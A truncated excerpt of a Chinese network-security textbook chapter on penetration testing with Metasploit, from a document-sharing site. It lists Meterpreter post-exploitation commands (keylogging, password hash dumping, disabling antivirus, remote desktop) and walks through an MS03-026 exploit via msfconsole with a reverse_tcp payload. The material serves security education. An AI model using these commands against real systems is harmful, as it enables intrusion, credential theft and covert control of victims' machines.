- 1、本文档共19页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
第6章
网络安全渗透测试技术;任务6.4.2通过命令行界面对服务器实施渗透测试;二、Metasploit框架结构MSF的操作步骤。
一)针对被攻击者主机的漏洞,选择用于发射恶意代码的发射器exploit。
1.search:查看可用的发射器exploits。
2.use:选用合适的发射器exploits。
二)选用攻击载荷payload(如木马等恶意代码),并设置相关参数。
1.showpayloads:查看所有可选的攻击载荷(恶意代码)。
2.setpayload:从大量的攻击载荷payloads中,选择一个,一般选用Meterpreter作为攻击载荷。
3.showoptions:查看攻击载荷的配置选项。
4.set:设置攻击载荷的配置选项、设置相关参数。;三)查看适用的操作系统
1.showtargets:查看所选的发射器和攻击载荷适用的操作系统及版本,如果与被攻击者的不符,则无法实施攻击。
2.settarget设置攻击的操作系统。
四)实施攻击
exploit:使用选好的发射器exploit和攻击载荷payload,执行渗透测试攻击,效果和run一样。参数–j表示攻击在后台进行。
以上是完整的步骤,根据实际情况,操作中可以省去其中某些步骤。;三、攻击载荷Meterpreter常用命令
Meterpreter是最常用的攻击载荷,其常用的命令如下:
1.background回到后台,即上一个命令提示符。
2.sessions每个攻击为一个会话,每个会话有一个唯一的ID,使用sessions命令可查看当前有哪些会话,即有哪些主机被控制了。
使用session-h命令可查看帮助信息。使用sessionsID命令可切换到指定的session会话。
使用session-kID命令可关闭指定的session会话。
3.screenshot对被攻击主机截屏,保存到本地。
4.sysinfo显示被攻击主机的系统信息。
5.ps查看被攻击主机正在运行的进程。
6.migrate将meterpreter迁移到相对稳定的进程中。
7.runkeylogrecorder键盘记录
8.runhashdump收集被攻击者主机的密码哈希值
9.runvnc打开被攻击者主机的桌面
10.runkillav关闭被攻击者主机的杀毒软件。;四、对Windows服务器实施MS03-026漏洞攻击
上一小节,我们通过Nessus扫描到了Windows服务器存在MS03-026漏洞。下面学习如何针对该已知漏洞,用命令行界面对目标系统实施渗透测试攻击。
1.打开命令行界面,输入msfconsole命令。
root@kali:~/Downloads#msfconsole
2.输入searchms03-026命令,查找针对漏洞ms03-026的exploit发射器。
msfsearchms03-026
[!]Moduledatabasecachenotbuiltyet,usingslowsearch
MatchingModules
================
NameDisclosureDateRankDescription
-----------------------------------
exploit/windows/dcerpc/ms03_026_dcom2003-07-16greatMS03-026MicrosoftRPCDCOMInterfaceOverflow
查找到针对该漏洞的发射器:exploit/windows/dcerpc/ms03_026_dcom
3.通过useexploit/windows/dcerpc/ms03_026_dcom命令,选用该exploit发射器。
msfuseexploit/windows/dcerpc/ms03_026_dcom;4.通过showpayloads命令,查看所有可选的攻击载荷payload(恶意代码)。
msfexploit(windows/dcerpc/ms03_026_dcom)showpayloads;可以看到,可用的payload攻击载荷很多。其中,windows/meterpreter/bind_tcp是kali主动联系被攻击者,如果要经过防火墙,易被过滤掉,不容易成功;我们将采用windows/meterpreter/reverse_tcp,
您可能关注的文档
- 《计算机网络安全防护技术(第二版)》 课件 第2章-任务2.7 穿越防火墙的灰鸽子木马实验.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第2章-任务2.8 配置ASAv的入侵检测功能.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第3章-任务3.1.1 探究古典加密技术.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第3章-任务3.1.2 探究DES加密技术.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第3章-任务3.2.1 探究RSA算法和DH算法.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第3章-任务3.2.2 应用PGP软件加密和探究SSH的加密过程.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第3章-任务3.3 探究数据指纹和任务3.4PGP软件签名的应用.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第3章-任务3.5 探究数字证书和架设SSL网站.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第4章 任务4.1配置 IPSEC VPN.pptx
- 《计算机网络安全防护技术(第二版)》 课件 第4章 任务4.2.1 配置GRE Over IPSec.pptx
文档评论(0)